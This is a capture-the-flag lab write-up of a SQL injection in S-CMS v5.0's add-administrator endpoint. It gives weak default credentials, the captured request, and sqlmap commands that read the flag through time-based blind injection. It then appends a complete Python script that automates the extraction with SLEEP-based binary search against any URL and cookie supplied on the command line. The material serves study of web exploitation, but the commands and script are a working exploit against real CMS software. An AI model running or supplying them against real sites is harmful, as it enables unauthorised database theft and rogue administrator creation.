Introduction
S-CMS v5.0 was found to contain a SQL injection (SQLi) vulnerability.
Walkthrough
Open the target, run a directory scan and find the backend login page at /admin.
Log in with the weak credentials admin/admin123.
Browsing the backend, the account management feature's "add administrator" action is SQL-injectable. Add an administrator and capture the request.
The captured request:
POST /admin/ajax.php?type=admin&action=add&lang=0 HTTP/1.1
Host: eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: http://eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com/admin/
Cookie: count_all=0; authx=; userx=; passx=; user=admin; pass=7b19569b9317927e14152e312767a351; A_type=1; auth=1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1; newsauth=all; productauth=all; textauth=all; formauth=all; bbsauth=all; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718723953,1718802016,1718849866,1718896116; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1718896116; PHPSESSID=acfe9ecbc6e48d2e492b8169ab7da438
Priority: u=1
A_login=asd&A_pwd=asd&A_email=asd%40qq.com&A_type=1&A_a0=1&A_textauth%5B%5D=13&A_newsauth%5B%5D=107
Save the request to a file and feed it to sqlmap:
python sqlmap.py -r ceshi.txt --dbs --batch
sqlmap reports that four parameters, A_newsauth among them, are injectable. Targeting A_newsauth shows a time-based blind injection. --randomize=A_login gives every request a fresh login name, so that repeatedly inserting the same administrator does not make the statement fail before the injected payload runs:
python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D --randomize=A_login --dbs --batch
Locate the flag column by searching information_schema for a column named flag:
python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D --randomize=A_login --dbms mysql --sql-query "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1"
Read the flag one character at a time (here the 17th character):
python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D --randomize=A_login --dbms mysql --sql-query "SELECT substring(flag,17,1) from scms.fllllaaaag"
The flag is flag{8ef3b98b-c8d2-4af1-82bf-a5ce95cd955e}
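The writeup reads the flag one substring at a time through sqlmap. The script below is an added example, not code from the writeup or from S-CMS, that automates the same time-based blind extraction against the captured endpoint: each character is recovered by binary search over its byte value, with a payload that makes MySQL SLEEP only when the comparison holds. It assumes the A_newsauth[] value lands in a numeric context of the INSERT (base value 107 as in the captured request) and a MySQL backend; the real injection shape is whatever sqlmap detected. The target URL and cookie are placeholders passed on the command line, and the offline simulated oracle is constructed for this example so the logic runs without a target.

```python
import re
import time
import urllib.parse
import urllib.request
import uuid

QUERY = "SELECT flag FROM scms.fllllaaaag LIMIT 1"  # the query used in the writeup


def build_payload(position, threshold, delay, base="107"):
    """Turn a boolean condition into a delay: the server sleeps only when the
    byte at `position` of the query result is greater than `threshold`.
    Assumption: A_newsauth[] sits in a numeric context (base 107 as captured)
    and the backend is MySQL (IF/SLEEP/ASCII/SUBSTRING)."""
    return (f"{base} AND IF(ASCII(SUBSTRING(({QUERY}),{position},1))>{threshold},"
            f"SLEEP({delay}),0)")


def extract(oracle, delay=3, max_len=64):
    """Recover the query result one character at a time by binary search over
    the byte range 0..255. SUBSTRING past the end returns '' and ASCII('') is 0
    in MySQL, so a recovered value of 0 marks the end of the string."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255            # invariant: lo <= byte value <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_payload(pos, mid, delay)):
                lo = mid + 1       # value > mid
            else:
                hi = mid           # value <= mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def http_oracle(base_url, cookie, delay=3):
    """oracle(payload) -> bool against the endpoint from the captured request,
    deciding on response time. Every request uses a fresh A_login because the
    vulnerable statement is an INSERT and a duplicate login could make it fail
    before the payload is evaluated (presumably why the writeup passes
    --randomize=A_login). base_url and cookie are caller-supplied placeholders."""
    url = base_url.rstrip("/") + "/admin/ajax.php?type=admin&action=add&lang=0"

    def oracle(payload):
        body = urllib.parse.urlencode({
            "A_login": "u" + uuid.uuid4().hex[:8],
            "A_pwd": "x", "A_email": "x@example.com", "A_type": "1",
            "A_a0": "1", "A_textauth[]": "13", "A_newsauth[]": payload,
        }).encode()
        req = urllib.request.Request(url, data=body, headers={
            "Cookie": cookie, "X-Requested-With": "XMLHttpRequest"})
        start = time.monotonic()
        with urllib.request.urlopen(req, timeout=delay * 4) as resp:
            resp.read()
        return time.monotonic() - start >= delay

    return oracle


def simulated_oracle(secret):
    """Offline stand-in for the target (constructed for this example): parses
    position and threshold out of the payload and answers exactly as MySQL's
    IF(ASCII(SUBSTRING(...))>threshold, ...) would, without network or sleep."""
    pat = re.compile(r"SUBSTRING\(\(.*?\),(\d+),1\)\)>(\d+),SLEEP")

    def oracle(payload):
        pos, thr = (int(x) for x in pat.search(payload).groups())
        ch = secret[pos - 1:pos]
        return (ord(ch) if ch else 0) > thr

    return oracle


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # python extract_flag.py http://target 'user=admin; pass=...; PHPSESSID=...'
        print(extract(http_oracle(sys.argv[1], sys.argv[2])))
    else:
        # Dry run against a constructed secret; no target needed.
        print(extract(simulated_oracle("flag{example}")))
```

Each character costs at most eight requests, and a hit is only counted when the response takes at least `delay` seconds, so on a noisy link raise `delay` rather than lowering the threshold; the same per-request login randomization that sqlmap does with --randomize is built into the HTTP oracle.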